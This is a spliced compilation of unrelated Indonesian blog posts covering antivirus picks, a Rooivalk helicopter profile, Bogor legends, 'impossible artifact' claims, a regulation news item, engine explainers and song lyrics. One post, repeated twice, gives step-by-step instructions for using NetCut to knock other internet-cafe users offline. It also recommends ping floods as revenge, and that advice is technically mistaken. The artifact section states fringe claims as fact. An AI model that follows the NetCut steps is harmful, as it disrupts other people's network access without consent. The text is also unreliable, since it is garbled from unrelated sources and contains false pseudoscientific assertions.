Klik disini download Avast 3. AVG Free Antivirus Siapa yang tidak kenal dengan AVG, sudah malang melintang di dunia program antivirus berbagai penghargaan di sabetnya. Kenyang akan pengalaman sebagai musuh virus, layak dijadikan perhatian utama kita kali ini sebagai antivirus top dan ampuh melindungi komputer pribadi. Meski gratis layanannya tidak kalah juga dengan versi premium lainnya anda juga bisa mengupgradenya menjadi premium dengan mudah sekali jika anda mau. AVG sangat praktis dan mudah digunakan proses installnya juga hanya butuh beberapa menit saja.

4. Avira AntiVir Personal Salah satu program ampuh yang juga diminati di pasar software antivirus sebab sangat bagus kinerjanya dalam mendeteksi serangan virus, spywarem dan rootkit threat. Juga ampu mendeteksi berbagai malware yang mengganggu. Sayangnya, versi gratisan ini tidak bisa otomatis melacak datangya email yang masuk yang dikhawatirkan disusupi oleh virus jahat. Sehingga anda harus melakukan proses pemindaian secara konvensional.

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Klik disini download ClamWin 8. Free eScan Antivirus Toollit Utility eScan Antivirus Toolkit 12 kompatibel dengan Windows 7 (32 dan 64bit). Program antivirus ini bisa scanning dan membersihkan virus, spyware, adware dan berbagai malware merugikan komputer. Asyiknya, eScan Antivirus adalah program portable yang bisa dijalankan di CD atau flasdisk serta mudah cara menggunakannya.

Klik disini download eScan Cukup ini saja yang perlu anda ketahui untuk membuat umur panjang usia pemakaian komputer rumah sekaligus aman berinternet ria. Tidak harus professional anda sudah bisa memperbaiki komputer sendiri hanya dengan sedikit tips penting menjaga stamina komputer dari A-Z di blog FastnCheap.

Rooivalk adalah helikopter serang generasi terbaru yang dibuat oleh Denel Aviation Afrika Selatan. Rooivalk AH-2As mulai dioperasikan pertama kali oleh Angkatan Udara Afrika Selatan (SAAF) pada bulan Juli 1999. Namun, SAAF menginginkan Rooivalk yang dilengkapi dengan rudal anti-tank Mokopa ZT-6, dan akhirnya diproduksi pada Maret 2004.

Pada Mei 2007, Denel Group menyatakan mereka akan berhenti mengembangkan Rooivalk, namun pada bulan November 2007 pemerintah Afrika Selatan mengumumkan mereka akan menginvestasikan dana 137 juta dolar di Rooivalk untuk membawanya ke status operasional pada tahun 2011.

Pada April 2011, SAAF menerima lima blok Rooivalk 1F versi upgrade yang bisa diintegrasikan dengan rudal anti-tank Mokopa.

Weapon Sistem Officer (WSO) berada di kokpit depan dan pilot duduk dibelakang WSO tersebut. Kokpit, dilengkapi dengan kursi crashworthy . proteksi armour, dan Kontrol Kolektif Hands-on dan Stick (HOCAS).

Thales Avionics TopOwl helmet-mounted sight display (HMSD) memberikan kru informasi display mengenai nap-of-the-earth-flight (NOE). TopOwl menggabungkan sistem pengukuran yang terintegrasi untuk mengarahkan senjata-senjata artikulasi seperti cannon, atau moncong rudal pencari udara-ke-udara. Rooivalk juga diintegrasikan dengan intensifier gambar Gen IV dan kemampuan FLIR dan terdapat juga transisi dari siang ke malam dengan hanya menekan sebuah tombol.

Rooivalk dibuat dengan struktur crash-resistant dan dirancang berfitur siluman dengan low radar, visual, dan inframerah dan akustik signature (jejak). Persenjataan

Rooivalk dapat dilengkapi dengan berbagai persenjataan komprehensif yang dipilih sesuai kebutuhan misi, mulai dari misi anti-tank, anti-helikopter, misi feri hingga memberikan supresi ke darat. Heli ini mampu menyerang beberapa sasaran di waktu yang sama pada jarak dekat dan jauh, menggunakan nose-mounted cannon dan berbagai amunisi underwing-mount .

F2 dual-feed 20mm, dengan penggunaan gas pada cannon-nya menghasilkan amunisi kecepatan tinggi hingga 1.100m/s dengan laju tembakan 740 putaran per menit. Cannon ini dipasang pada “dagu” Rooivalk.

Rooivalk juga dipersenjatai dengan rudal jarak jauh anti-tank Mokopa yang dikembangkan oleh Divisi Kentron dari Denel. Rudal Mokopa memiliki kepala pencari semi-aktif dan dilengkapi dengan hulu ledak tandem dengan rentang lebih dari 8,5km.

Selain itu, Rooivalk juga dapat membawa empat rudal udara-ke-udara seperti Denel Aerospace Systems V3C Darter atau MBDA Mistral dan mampu menembakkan rudal HOT 3 dan Hellfire.

Rudal Darter V3C dam Mistral memiliki pencari inframerah untuk penunjukkan target. Mistral yang memang telah digunakan oleh SAAF memiliki jangkauan efektif sekitar 6km.

Rooivalk juga dilengkapi dengan roket udara folding-fin (lipat-sirip) 70mm dari perusahaan Forges de Zeebrugge Belgia dengan berbagai hulu ledak yang dapat dipilih sesuai dengan jenis target dalam misi.

Suite Peperangan Elektronik

Suite ini terdiri dari suite perlindungan diri (HEWSPS), menggabungkan peringatan radar, peringatan laser dan sistem penanggulangan ancaman.

Navigasi dan Komunikasi

Rooivalk dilengkapi dengan suite navigasi canggih antara lain sensor radar Doppler, dan Thales Avionics dengan 8 channel GPS.

Suite komunikasi terdiri dari dua VHF/UHF transceiver dengan AM, FM dan pengolahan digital percakapan, satu radio HF dengan frekuensi yang aman, dan IFF transporder.

Karakteristik dan Spesifikasi

Di wilayah sekitar Halimun Bogor dan sekitarnya ada benteng benteng milik Prabu Siliwangi yang tak kelihatan, pusat kerajaan ada di Gunung Salak, sebenarnya ini sudah menjadi rahasia umum.

Catatan sejarah soal Kerajaan Siliwangi pasca kehancurannya setelah diserang Kesultanan Banten pada tahun 1620-an, adalah catatatan pertama kali dari Scipio yang melakukan ekspedisi sekitar tahun 1687 mencatat ada ratusan macan gembong atau harimau bertempat tinggal di sebuah bangunan dekat Kebun Raya Bogor sekarang.

Selain itu ditemukan rawa yang berisi badak di sekitar Sawangan, dinamakan Rawa Badak dimana di ujung Rawa Badak ditemukan juga situs parit dan bekas tembok keraton yang dijadikan sarang macan, sekarang sarang macan ini dikenal pertigaan beringin di Sawangan. Selain catatan-catatan arkeologi, ada catatan mistis tentang segitiga Bogor.

Ada tiga gunung yang dianggap angker di masa Mataram Sultan Agung, pertama Gunung Merapi, Kedua Gunung Slamet dan Ketiga Gunung Halimun, diantara ketiganya Gunung Halimun-lah yang dianggap paling angker karena memiliki misteri luar biasa. Sampai saat ini banyak peristiwa jatuhnya pesawat di sekitar segitiga Gunung Halimun-Gunung Salak-Gunung Gede.

Daya energi ketiga gunung itu ada di Istana Cipanas, sekitar gedung yang dibangun Bung Karno namanya Gedung Bentol, tempat dimana Bung Karno selalu bermeditasi sejak dia menempati Istana Merdeka di tahun 1949. Di belakang Gedung Bentol ada sumber air panas, yang merupakan energi dari Siliwangi.

Dilamarnya Puteri Dyah Pitaloka yang kecantikannya serupa bidadari dan mewariskan kecantikan yang bisa dilihat pada gadis-gadis Bandung, Cianjur dan Sumedang sekarang ini adalah rahasia ‘Wahyu Nusantara’ yang dimiliki kerajaan Pajajaran, dimana Gadjah Mada ingin memilikinya “Siapa yang menguasai Wahyu Nusantara dia akan menguasai Indonesia’, penguasaan wahyu nusantara ini menimbulkan konflik antara Hayam Wuruk yang berpendapat bahwa wahyu itu bisa diambil dengan cara Ken Arok yaitu menikahi puteri sang Raja, di satu sisi wahyu bisa diambil dengan cara menaklukkan Pajajaran dan membangun kerajaan Majapahit Barat di Pakuan.

Tanpa disengaja menurut kepercayaan banyak orang Bung Karno mengawini puteri Bandung, yaitu. Inggit Garnasih yang ditengarai masih keturunan Raja Siliwangi dimana wahyu Nusantara bersemayam di tubuh Inggit Garnasih, dan Bung Karno keturunan langsung Brawijaya V mengobarkan semangat Nusantara bermula di Bandung pada rapat politik Radicale Concentratie di Bandung tahun 1922.

Bandung adalah kota terakhir dimana Prabu Linggabuana menyucikan diri di danau Bandung sebelum berangkat ke Majapahit dan kelak beristirahat di Pesanggrahan Bubat dimana kemudian datang Gadjah Mada dan terjadilah insiden pembunuhan dan pembantaian besar-besaran rombongan Pajajaran.

Sisa-sisa dari Laskar Perang Bubat melarikan diri ke Gunung Salak, sementara sisa-sisa dari punggawa Siliwangi yang diserang Banten lari ke Gunung Halimun. Tempat dimana seringnya pesawat menghilang, ini mirip dengan segitiga Bermuda dan segitiga formosa.

Gunung Halimun dan Gunung salak ini mirip Gunung Lawu yang disucikan Majapahit, tak boleh ada yang melintasi di atasnya, burungpun bisa mati bila melewati satu titik tanah yang sakral.

Apakah ini hanya fenomena alam atau karena suatu kekuatan gaib? HANYA TUHAN YANG TAHU!

Selama beberapa dekade terakhir, penambang di Afrika Selatan telah menggali bola2 logam misterius. Asalnya tidak diketahui, bola2 ini berdiameter sekitar satu inci atau lebih, dan ada beberapa yang terukir dgn 3 alur paralel disepanjang diameter bola. Dua jenis bola telah ditemukan: yg satu terdiri dari logam padat kebiruan dgn bintik2 putih, yg lain terdapat cekungan dan berisi zat putih kenyal. Hebatnya adalah bahwa batu dimana bola2 tsb ditemukan ini berasal dari era Prakambrium – dan berumur 2,8 miliar tahun! Siapa yg membuat bola-bola tsb dan untuk apa tujuannya tidak diketahui hingga kini.

2. The Dropa Stones Pada tahun 1938, sebuah ekspedisi arkeologi dipimpin oleh Dr Chi Pu Tei ke pegunungan Baian-Kara-Ula, China membuat penemuan yang mengejutkan di beberapa gua yang tampaknya telah dihuni oleh beberapa kebudayaan kuno. Terkubur oleh zaman di lantai gua terdapat ratusan piringan batu(disk stones). Berdiameter sekitar sembilan inci, masing-masing memiliki lingkaran ditengah dan terukir dengan alur spiral, terlihat oleh seluruh dunia seperti piringan hitam kuno(piringan musik) berumur 10.000-12.000 tahun. Alur spiral tsb, ternyata, terdiri dari huruf hieroglif kecil yang menceritakan kisah yang menakjubkan tentang pesawat ruang angkasa dari dunia yg jauh yang jatuh di pegunungan tsb. Pesawat luar angkasa tsb dikemudikan oleh orang-orang yang menyebut diri mereka Dropa, dan sisa keturunan mereka, mungkin, ditemukan di gua tsb.

3. The Ica Stones Pada awal tahun 1930-an, ayah dari Dr Javier Cabrera, Antropolog Kebudayaan Ica, Peru, menemukan ratusan batu utk upacara pemakaman di makam suku Inca kuno. Dr Cabrera, melanjutkan pekerjaan ayahnya, telah mengumpulkan lebih dari 1.100 batu andesit tsb, yang diperkirakan berumur 500-1.500 tahun dan telah dikenal luas sebagai Ica Stones. Batu-batu tsb berukiran, kebanyakan bergambar/bergrafis seksual (yang umum bagi kebudayaan), patung berhala dan yang lain menggambarkan praktek-praktek kedokteran seperti operasi jantung dan transplantasi otak. Ukiran yang paling menakjubkan, bagaimanapun, jelas menggambarkan dinosaurus seperti Brontosaurus, Triceratops (lihat foto), Stegosaurus dan Pterosaurus. Walaupun ada yg beranggapan Ica Stones hoax/tipuan, keasliannya belum tersangkalkan atau terbukti hingga saat ini.

4. Giant Stone Balls of Costa Rica Para pekerja mencangkul dan membakar melalui lebatnya hutan Kosta Rika guna membersihkan area untuk perkebunan pisang di tahun 1930-an terhambat oleh beberapa obyek yang luar biasa: puluhan bola batu, kebanyakan bola tsb bahkan bulat sempurna. Ukuran mereka bervariasi dari yang kecil seperti bola tenis sampai yang berdiameter 8 kaki (2,4 m) dengan berat 16 ton! Meskipun bola batu besar tsb jelas buatan manusia, tidak diketahui siapa yang membuat dan untuk tujuan apa, dan yang paling membingungkan, bagaimana mereka mencapai presisi lingkaran bola tersebut (bulat sempurna). 5. Oera Linda Book

Buku Oera Linda adalah naskah Frisian yg kontroversial mencakup tema sejarah, mitologi, dan religius yg pertama kali muncul di abad ke-19. Tema didalam Buku Oera Linda termasuk katastrofisme, nasionalisme, matrilineal, dan mitologi. Buku tsb menyatakan bahwa Eropa dan daratan lainnya, dalam sejarah mereka, diperintah oleh serangkaian ibu rakyat yg terpimpin dalam hirarkisme pendeta-pendeta perempuan (perawan) yg mempersembahkan diri untuk dewi Frya, putri dari dewa tertinggi Wr-Alda dan Irtha, sang ibu bumi. Dan menyatakan bahwa peradaban Frisian tsb menguasai alfabet yang merupakan leluhur dari abjad Yunani dan Fenisia. Naskah tsb bertanggalkan tahun 1256. Diklaim bahwa buku tsb adalah salinan dari naskah yg lebih tua, dan jika asli, ditulis oleh orang-orang diantara tahun 2194 SM – 803 M. 6. Impossible Fossils

Fosil, seperti yang kita pelajari di sekolah dasar, muncul dalam batuan yang terbentuk ribuan tahun yg lalu. Namun ada sejumlah fosil yg tidak masuk akal baik secara geologi maupun sejarah. Sebuah fosil jejak tangan manusia misalnya, ditemukan di batu kapur yg diperkirakan berumur 110 juta tahun. Sebuah fosil jari manusia yg ditemukan di Kutub Utara Kanada juga berumur 100-110 juta tahun. Dan terdapat fosil jejak kaki manusia, kemungkinan memakai sandal, ditemukan dekat Delta, Utah dalam endapan serpih diperkirakan berumur 300 jt – 600 jt tahun.

7. Out-of-Place Metal Objects Manusia bahkan belum ada 65 juta tahun yg lalu, apalagi orang-orang yg bisa membuat logam. Jadi bagaimana ilmu pengetahuan menjelaskan tabung logam semi-bulat digali dari batu Kapur berusia 65 juta-tahun di Prancis? Pada tahun 1885, sebuah bongkahan batubara pecah dan ditemukan sebuah logam berbentuk kubus yg jelas dibuat oleh tangan yg cerdas. Pada tahun 1912, karyawan di sebuah pabrik listrik memecahkan sebuah bongkahan besar batubara dan kemudian sebuah panci besi jatuh dari dalamnya! Sebuah paku ditemukan tertanam dlm sebuah bongkahan batu pasir dari Era Mesozoic. Dan masih banyak lagi, anomali/keanehan seperti diatas.

JAKARTA. Kementerian Komunikasi dan Informatika (Kemkominfo) memastikan setiap perusahaan yang melakukan transaksi elektronik untuk melakukan pendaftaran. Hal ini sesuai dengan ketentuan Rancangan Peraturan Menteri Komunikasi dan Informatika tentang Tata Cara Pendaftaran Penyelenggaraan Sistem dan Transaksi Elektronik (PSTE) yang sedang dibahas di tingkat pemangku kepentingan (stakeholders).

Direktur Jenderal Aplikasi dan Telematika Kemkominfo, Aswin Sasongko mengatakan pembahasan terus dilakukan untuk memastikan mekanisme pendaftaran PSTE. “Setelah selesai akan diajukan ke Menteri untuk segera dilakukan uji publik,” ujarnya kepada Kontan, Selasa (12/2).

Sebagai info, akan terbitnya RPM Kominfo tentang tata cara pendaftaran PSTE merupakan amanat dari Peraturan Pemerintah (PP) Nomor 82 Tahun 2012 tentang PSTE. PP ini sendiri hadir untuk memberikan jaminan keamanan dalam setiap transaksi yang menggunakan sistem elektronik.

Menurut Aswin, peraturan ini akan mengatur secara detail mekanisme pendaftaran transaksi sistem elektronik. Ia menjabarkan, peraturan tersebut akan memastikan perusahaan apa saja yang akan diwajibkan untuk melakukan pendaftaran untuk bisa melakukan transaksi elektronik.

Nantinya setiap perusahaan Badan Usaha Milik Negara (BUMN) yang melakukan pelayanan publik akan di prioritaskan untuk melakukan pendaftaran PSTE. Perusahaan-perusahaan tersebut seperti PT PLN (Persero), PT Pertamina (Persero), dan perusahaan di sektor Perbankan serta transportasi.

Namun Aswin menambahkan, pihaknya juga menemukan ada perusahaan yang websitenya tidak dipakai untuk melakukan kegiatan transaksi. Website perusahaan yang dimiliki hanya digunakan untuk memberi informasi saja, sehingga masih perlu dibahas lebih lanjut.

Menurut Aswin, pemerintah menargetkan RPM tentang tata cara pendaftaran PSTE akan diuji publik pada akhir Februari ini. PP Nomor 82 Tahun 2012 sendiri mengamanatkan pelaksanaan mekanisme pendaftaran PSTE sudah dilakukan pada akhir tahun 2013 ini.

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Team-Cyber4rt - Ada kalanya internet kita lemot dikala bermain di warnet kebetulan sekarang saya sedangan mengalami hal seperti ini, kita sedang bermain game online tiba - tiba terjadi lag? Nah mungkin salah satu user dari warnet tersebut mendownload sehingga koneksi internet berdampak pada orang lain yang ada di warnet tersebut. Nah saya sendiri pernah mengalami kejadian koneksi internet di warnet saya menjadi lola, ini dikarenakan user sedang buffering video. Karena saya sedang bermain PB ( Point Blank ) kalau ngelag sendiri pastilah permainan jadi kacau, akhirnya dengan ide cemerlang untuk memutuskan koneksi internet orang tersebut.

Singkat cerita tuh orang sepertinya frustasi sekali karena saya memutuskan koneksi internet tersebut dan permainan DotA pun lancar yang diakhiri dengan kekalahan, wkwk. Nah akhirnya di blog ini saya ingin menyempatkan diri untuk memposting cara memutuskan koneksi internet orang lain di warnet .

Jalankan Netcut nya. Setelah kalian menjalankan Booter nya kalian akan melihat tampilan lebih kurang begini ;

* Selanjutnya Tekan Tombol Find. akan ada pop up window. Saat kalian berada pada saat memasukan Local ip ke textbox maka user akan telihat. Jika kalian ga tau cara lihat Local IP, cari gateway Kalian dan lihat.

* Selanjutnya, pilih User yang ingin di tendang, lalu Tekan "Cut OFF". Matilah Koneksinya.

Cek ARP untuk mengetahui apakah ada orang yang memakai NetCut.

Start menu > run > ketik "cmd" atau command prompt > ketik lagi "arp - a" untuk melihat IP router. Kalau ada lebih dari satu ip router, Nah, @_@. Kerjai balik si Pembuat ulah. Banjiri laptopnya dengan ping yang bejibun dan terus menerus. Biar cepat hang sekalian terutama jika RAM nya rendah. Amin. start menu > run > ketik "cmd" >> ketik lagi "ping google. com - t" "ping facebook. com - t" "ping yahoo. com - t" "ping zynga. com - t" "ping detik. com - t" "ping vivanews. com - t", trus ampe bejibun. Biar restart skalian.

Yang Saya jelaskan adalah penyerangan lewat CMD, kadang-kadang masih banyak cara lain, seperti install program Anti ARP, Hidden komputer dari LAN pake XP antispy, Bisa juga memakai program seperti Anti NetCut di Rating 4.5

Anda sedang membaca artikel tentang May 2013 dan anda bisa menemukan artikel May 2013 ini dengan url http://team-cyber4rt. blogspot. com/2013/05/cara-memutuskan-koneksi-internet-orang_9.html, anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel May 2013 ini sangat bermanfaat bagi teman-teman anda, namun jangan lupa untuk meletakkan link May 2013 sumbernya.

Team-Cyber4rt - Ada kalanya internet kita lemot dikala bermain di warnet kebetulan sekarang saya sedangan mengalami hal seperti ini, kita sedang bermain game online tiba - tiba terjadi lag? Nah mungkin salah satu user dari warnet tersebut mendownload sehingga koneksi internet berdampak pada orang lain yang ada di warnet tersebut. Nah saya sendiri pernah mengalami kejadian koneksi internet di warnet saya menjadi lola, ini dikarenakan user sedang buffering video. Karena saya sedang bermain PB ( Point Blank ) kalau ngelag sendiri pastilah permainan jadi kacau, akhirnya dengan ide cemerlang untuk memutuskan koneksi internet orang tersebut.

Singkat cerita tuh orang sepertinya frustasi sekali karena saya memutuskan koneksi internet tersebut dan permainan DotA pun lancar yang diakhiri dengan kekalahan, wkwk. Nah akhirnya di blog ini saya ingin menyempatkan diri untuk memposting cara memutuskan koneksi internet orang lain di warnet .

Jalankan Netcut nya. Setelah kalian menjalankan Booter nya kalian akan melihat tampilan lebih kurang begini ;

* Selanjutnya Tekan Tombol Find. akan ada pop up window. Saat kalian berada pada saat memasukan Local ip ke textbox maka user akan telihat. Jika kalian ga tau cara lihat Local IP, cari gateway Kalian dan lihat.

* Selanjutnya, pilih User yang ingin di tendang, lalu Tekan "Cut OFF". Matilah Koneksinya.

Cek ARP untuk mengetahui apakah ada orang yang memakai NetCut.

Start menu > run > ketik "cmd" atau command prompt > ketik lagi "arp - a" untuk melihat IP router. Kalau ada lebih dari satu ip router, Nah, @_@. Kerjai balik si Pembuat ulah. Banjiri laptopnya dengan ping yang bejibun dan terus menerus. Biar cepat hang sekalian terutama jika RAM nya rendah. Amin. start menu > run > ketik "cmd" >> ketik lagi "ping google. com - t" "ping facebook. com - t" "ping yahoo. com - t" "ping zynga. com - t" "ping detik. com - t" "ping vivanews. com - t", trus ampe bejibun. Biar restart skalian.

Yang Saya jelaskan adalah penyerangan lewat CMD, kadang-kadang masih banyak cara lain, seperti install program Anti ARP, Hidden komputer dari LAN pake XP antispy, Bisa juga memakai program seperti Anti NetCut di Rating 4.5

Anda sedang membaca artikel tentang May 2013 dan anda bisa menemukan artikel May 2013 ini dengan url http://team-cyber4rt. blogspot. com/2013/05/cara-memutuskan-koneksi-internet-orang. html, anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel May 2013 ini sangat bermanfaat bagi teman-teman anda, namun jangan lupa untuk meletakkan link May 2013 sumbernya.

-Posisi rotor sisi a merupakan proses langkah hisap, pada langkah hisap campuran udara dan bahan bakar dihisap masuk ke ruang vakum.

-Posisi rotor sisi b awal merupakan proses langkah kompresi, pada langkah ini campuran udara dan bahan bakar dikompresikan, posisi rotor sisi b akhir merupakan proses langkah usaha, pada langkah ini busi membakar campuran udara dan bahan bakar, tekanan tinggi hasil dari pembakaran menghasilkan ledakan dan menimbulkan tenaga untuk menggerakkan rotor.

-Posisi rotor sisi c merupakan proses langkah pembuangan, pada langkah ini tekanan tinggi hasil pembakaran keluar melalui exhaust port menuju knlapot.

Kalau kalian ingin pakai mesin ini kalian harus jadi anak Poltak Raja Minyak, karena boros bahan bakar, namun mesin ini sangat cepat/kencang.

Ukuran dan bentuk dari rotor serta ruang bakar dapat mempengaruhi tenaga yang dihasilkan. Untuk pemanfaatan tenaga yang besar sekaligus mesin halus (minim getaran), maka dikembangkan mesin wankel dengan dua rotor, yang dipasang berbanding tegak lurus dengan rotor kedua.

Biasanya sisi-sisi dari rotor diberi cekungan kedalam yang berfungsi sebagai ruang bakar tambahan. Ujung-ujung dari rotor terdapat seal yang berfungsi sebagai perapat antara rotor dengan rumah rotor pada saat kompresi, agar tidak terjadi kebocoran kompresi. Pendinginan pada mesin wankel menggunakan air pendingin sedangkan untuk rotornya menggunakan pendinginan oli.

Pada postingan sebelumnya kita membahas mesin 4 tak bensin. sesuai dengan janji saya kita akan bahas mesin lainnya.

Mesin 2 tak pada prinsipnya bekerja dengan 2 langkah piston atau 1 putaran poros engkol. Dalam satu siklus kerja mesin 2 tak hanya terdiri dari 1 kali gerakan naik dan 1 gerakan turun dari piston saja, berbeda dengan mesin 4 tak yang dalam satu siklus kerja mesin harus terdiri dari 2 gerak naik dan 2 gerak turun.

Untuk lebih jelasnya kalian pelajari dulu mesin 4 tak agar lebih mudah belajar dalam pembahasan mesin 2 tak Dalam motor bensin 2 tak, piston melakukan 2 kali langkah kerja dalam 1 kali langkah usaha antara lain :

1. Langkah kompresi dan langkah hisap Pada langkah ini dalam motor 2 tak terjadi 2 aksi berbeda yang terjadi secara bersamaan yaitu aksi kompresi yang terjadi pada ruang silinder atau pada bagian atas dari piston dan aksi hisap yang terjadi pada ruang engkol atau pada bagian bawah piston. Yang terjadi dalam langkah ini adalah :

-Piston bergerak dari TMB (titik mati bawah) ke TMA (titik mati atas). - Pada saat saluran pembiasan tertutup mulai dilakukan langkah kompresi pada ruang silinder. - Pada saat saluran hisap membuka maka campuran udara dan bensin akan masuk ke dalam ruang engkol.

2. Langkah usaha dan buang Dan pada langkah ini terjadi langkah usaha dan buang yang terjadi pada saat yang tidak bersamaan, jadi langkah usaha dahulu barulah setelah saluran pembiasan dan saluran buang terbuka terjadi langkah buang. Yang terjadi dalam langkah ini adalah : - Sebelum piston mencapai TMA (titik mati atas), busi akan memercikkan bunga api listrik sehingga campuran udara dan bahan bakar akar terbakar dan menyebabkan ledakan maka timbullah daya dorong terhadap piston, sehingga piston akan bergerak dari TMA (titik mati atas) ke TMB (titik mati bawah). - Sesaat setelah saluran hisap tertutup dan saluran bias serta saluran buang membuka maka campuran udara dan bahan bakar yang berada di ruang engkol akan mendorong gas sisa hasil pembakaran melalui saluran bias ke saluran.

Mesin 2 tak harus memakai oli pelumas samping selain pelumas mesin hal ini di sebabkan karena putaran yang dihasilkan lebih cepat. Karena hanya membutuhkan 2 langkah kerja mesin 2 lebih cepat/kencang dari 4 tak hal ini menyebabkan mesin 2 tak lebih berisik, dan boros bahan bakar, jadi tidak ada mesin yang sempurna pasti ada kekurangannya. Oke jadi udah ngerti kan? Semoga bermanfaat ilmunya. Sekian.

Kalau kalian anak SMK jurusan otomotif pasti akan belajar cara kerja mesin 4 tak pada pelajaran Pendidikan Dasar Teknik Mesin (PDTM) . Tapi bukan cuma itu aja, pasti kalian akan belajar mesin lain juga seperti motor listrik AC/DC, mesin diesel, mesin 2 tak, dll. Banyak banget yang akan kalian pelajari tentang konversi energi.

Karburator. Berfungsi membuat bahan bakar menjdi kabut. TMA (Titik Mati Atas). Adalah titik henti piston bergerak ke atas. TMB (Titik Mati Bawah. Adalah titik henti piston bergerak kebawah.

Dalam langkah ini kedua katup tertutup. Bila campuran udara dan bensin yang terkompresi dalam silinder terkena percikan listrik dari busi, maka terjadi ledakan dalam silinder sehingga tenaga yang kuat ini akan mendorong piston dari TMA ke TMB. Tenaga inilah yang dimanfaatkan untuk memutar roda gila.

Dalam langkah ini piston dari TMB naik kembali ke TMA untuk mendorong sisa gas-gas yang telah terbakar dari silinder melewati katup buang menuju knalpot. Selama gerak ini kerja katup buang saja yang terbuka. Bila piston mencapai TMA sesudah melakukan pekerjaan seperti di atas, maka piston akan kembali pada keadaan untuk memulai gerak hisap.

KARAKTER MESIN Dalam komposisi displacement mesin yang sama, tiap mesin memiliki karakter yang berbeda-beda, tergantung dari besaran diameter piston dan panjang langkah. - Mesin OverBore. Langkah lebih kecil daripada diameter piston. - Mesin Square :Langkah dan diameter piston sama. - Mesin OverStroke :Langkah lebih besar daripada diameter piston.

Dibanding dengan mesin langkah panjang dan square, mesin over bore lebih mudah untuk membuat kecepatan mesin bertambah dan tenaga yang dihasilkan bisa lebih besar. Jika kecepatan mesin rata, kecepatan piston dapat dibuat lebih rendah juga hambatan gesek dapat dikurangi. Pada mesin balap desain mesin ini lebih sering unggul. Oleh karenanya modifikasi BoreUp . atau memperbesar diameter piston lebih mudah menciptakan kecepatan dan tenaga dibanding StrokeUp .

Demikian lah pejelasan singkat ttg cara kerja mesin 4 tak .

Lagu Bohemian Rhapsody mempunyai struktur chord yang sulit dimainkan dan dinyanyikan, menggunakan kunci-kunci aneh, dan nada dasarnya cepat sekali berubah. Selain terletak pada keindahan partitur, Bohemian Rhapsody menjadi sangat menarik karena lirik lagunya yang mengundang misteri sejalan dengan kepergian sang penciptanya Freddy Mercury vokalis dari grup musik Queen . Struktur lirik Bohemian Rhapsody sangat complicated, dan menimbulkan banyak perdebatan makna lagu. Banyak yang mengatakan bahwa lagu ini sulit dipahami, mengandung kata-kata yang bisa dibilang aneh, terutama di bagian Opera-nya. Berikut lirik lagunya:

Is this the real life? Is this just fantasy?

Caught in a landslide, no escape from reality

Open your eyes, look up to the skies and see

I'm just a poor boy, I need no sympathy

Because I'm easy come, easy go, little high, little low

Any way the wind blows doesn't really matter to me, to me

Mama, just killed a man

Put a gun against his head, pulled my trigger now he's dead

Mama, life had just begun

But now I've gone and thrown it all away

Mama, ooh, Didn't mean to make you cry

If I'm not back again this time tomorrow

Carry on, carry on as if nothing really matters

Too late, my time has come

Sends shivers down my spine, body's aching all the time

Goodbye, ev'rybody, I've got to go

Gotta leave you all behind and face the truthMama, ooh, I don't want to diesometimes wish I'd never been born at all

I see a little silhouetto of a man

Scaramouche, Scaramouche, will you do the Fandango

Thunderbolt and lightning, very, very fright'ning me

(Galileo.) Galileo. (Galileo.) Galileo, Galileo figaro

Magnifico. I'm just a poor boy, nobody loves me

He's just a poor boy from a poor family

Spare him his life from this monstrosity

Easy come, easy go, will you let me go

Bismillah! No, we will not let you go

(Let him go!) Bismillah, we will not let you go

(Let him go!) Bismillah, we will not let you go

(Let me go!) Will not let you go

(Let me go!) Will not let you go.

(Let me go!) No, no, no, no, no, no, no.

Mama mia, mama mia mama mia, let me go

Beelzebub has a devil put aside for me, for me, for me

So you think you can stone me and spit in my eye

So you think you can love me and leave me to die

Oh, baby, can't do this to me, baby

Just gotta get out, just gotta get right outta here

Posisi Netral (N) Saat posisi netral tenaga dari mesin tidak diteruskan ke poros out put, karena sincromesh dalam keadaan bebas atau tidak terhubung dengan roda gigi tingkat.

Posisi 1 Jika tuas ditarik ke belakang maka gear selection fork akan menghubungkan unit sincromesh untuk berkaitan dengan gigi tingkat 1. Posisi 1 akan menghasilkan putaran yang lambat tetapi momen pada poros out put besar.

Posisi 2 Tuas didorong ke depan menggerakkan gear selector fork sehingga unit sincromesh berhubungan dengan roda gigi tingkat no 2. Posisi 2 putaran poros out put lebih cepat dibanding pada posisi 1.

Posisi 3 Jika tuas ditarik ke belakang maka gear selection fork akan menghubungkan unit sincromesh untuk berkaitan dengan gigi tingkat 3. Posisi 3 akan menghasilkan putaran yang cepat dibanding posisi 2.

Posisi 4 Tuas didorong ke depan menggerakkan gear selector fork sehingga unit sincromesh berhubungan dengan roda gigi tingkat no 4. Posisi 4 putaran poros out put lebih cepat dibanding pada posisi 3.

Posisi 5 Tuas ditarik ke belakang menggerakkan gear selection fork sehingga unit sincromesh berhubungan dengan roda no 5. Transmisi pada posisi gigi lima kecepatanya paling tinggi tetapi momen yang dihasilkan pada poros out put paling kecil.

Posisi R (Reverse) Tuas didorong ke depan menggerakkan gear selection fork sehingga unit sincromesh berhubungan dengan roda gigi R. Antara roda gigi R dan roda gigi pembanding dipasangkan roda gigi idel (idler gear) yang menyebabkan putaran poros input berlawanan arah dengan poros out put.

Berikut simulasi transmisi

Selasa, 05 Februari 2013

Manusia tak akan tahu terjadi pada masa depannya nanti. Pahamilah tujuan hidup ini dan berusahalah untuk bisa meraih apa yang kita cita-citakan… Dan tentukanlah jalan hidup yg benar dimata Tuhan, hingga ajal menjemput di hari yang tidak kita ketahui.

*Orang baik dicintai oleh semua orang, namun orang benar mungkin saja dibenci banyak orang.

When you're talkin to yourself

And nobody's home

You can fool yourself

You came in this world alone

So nobody ever told you baby

How it was gonna be

So what'll happen to you baby

Guess we'll have to wait and see

Old at heart but I'm only 28

And I'm much too young

To let love break my heart

Young at heart but it's getting much too late

To find ourselves so far apart

I don't know how you're s'posed to find me lately

An what more could you ask from me

How could you say that I never needed you

When you took everything

Said you took everything from me

Young at heart an it gets so hard to wait

When no one I know can seem to help me now

Old at heart but I musn't hesitate

If I'm to find my own way out

Still talkin' to myself

And nobody's home

So nobody ever told us baby

How it was gonna be

So what'll happen to us baby

Guess we'll have to wait and see

When I find out all the reasons

Maybe I'll find another way

Find another day

With all the changing seasons of my life

Maybe I'll get it right next time

An now that you've been broken down

Got your head out of the clouds

You're back down on the ground

And you don't talk so loud

An you don't walk so proud

Any more, and what for

Well I jumped into the river

Too many times to make it home

